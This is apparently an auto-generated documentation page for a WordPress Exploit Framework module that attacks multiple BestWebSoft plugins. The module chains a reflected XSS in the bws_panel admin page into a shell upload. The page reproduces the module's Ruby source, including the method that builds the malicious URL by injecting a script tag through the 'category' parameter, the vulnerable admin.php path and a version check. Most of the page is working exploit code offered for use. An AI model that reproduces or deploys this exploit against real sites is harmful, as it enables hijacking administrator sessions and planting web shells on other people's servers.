class Wpxf::Exploit::BwsPanelReflectedXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ReflectedXss::new
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'Multiple BestWebSoft Plugins Reflected XSS Shell Upload', author: [ 'DefenseCode', # Discovery 'rastating' # WPXF module ], references: [ ['WPVDB', '8796'], ['URL', 'http://www.defensecode.com/advisories/DC-2017-02-014_50_WordPress_plugins_by_BestWebSoft_Advisory.pdf'] ], date: 'Apr 12 2017' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 23 def check return :unknown if plugin_name.nil? return :vulnerable if fixed_version.nil? check_plugin_version_from_readme(plugin_name, fixed_version) end
fixed_version()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 34 def fixed_version nil end
plugin_name()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 30 def plugin_name nil end
url_with_xss()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 42 def url_with_xss "#{vulnerable_url}?page=bws_panel&category=%22%3E%3Cscript%3E#{xss_url_and_ascii_encoded_include_script}%3C%2Fscript%3E%3C%22" end
vulnerable_url()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 38 def vulnerable_url normalize_uri(wordpress_url_admin, 'admin.php') end